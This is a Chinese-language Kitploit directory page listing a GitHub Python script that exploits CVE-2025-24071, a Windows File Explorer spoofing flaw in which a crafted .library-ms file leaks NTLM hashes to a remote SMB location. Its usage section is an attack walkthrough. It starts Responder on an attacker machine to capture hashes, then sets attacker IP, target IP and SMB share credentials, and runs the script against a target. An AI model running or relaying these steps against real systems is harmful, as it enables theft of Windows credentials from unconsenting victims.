Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24071 — 执行CVE-2025-24071的Python脚本 | Kitploit
工具/GitHubGitHub/ac8999/cve-2025-24071
密码破解漏洞分析漏洞利用信息收集渗透测试红队
GitHubac8999/cve-2025-24071

CVE-2025-24071

执行CVE-2025-24071的Python脚本

查看仓库
141年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24071:微软 Windows 文件资源管理器欺骗漏洞(SilentExploit 脚本)

📖 描述

本项目检测并展示 Windows 文件资源管理器欺骗漏洞的利用方法。

该问题源于一个包含网络路径的 Windows 库文件(.library-ms),该文件可直接作为附件嵌入或包含在压缩包中。
打开该文件时,可能导致 Windows 向远程(潜在恶意)网络位置 泄露 NTLM 哈希。

POC:https://imgur.com/a/hEO83Se

⚡ 用法

1. 启动 Responder

在攻击机上运行 Responder 以捕获 NTLM 哈希:

root@kitploit:~
sudo responder -I tun0 -wvF

2. 运行脚本

你可以通过两种方式配置脚本:

✅ 选项 A:编辑默认值(最简单)

直接在脚本中修改默认参数。

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="攻击者 IP")      # 你的 IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="目标 IP")         # 目标 IP 
    parser.add_argument("--share-name", default="IT", help="SMB 共享名称")               # 你拥有访问权限的共享名称(不带 /)
    parser.add_argument("--username", default="USERNAME", help="SMB 用户名")          # 共享拥有者的用户名 
    parser.add_argument("--password", default="PASSWORD", help="SMB 密码")        # 共享拥有者的密码 
    parser.add_argument("--interface", default="tun0", help="Responder 网络接口")        # 检查 ifconfig,如果你在 VPN 上,tun0 即可使用
    return parser.parse_args()

✅ 选项 B:使用命令行参数运行

带参数执行:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
下载工具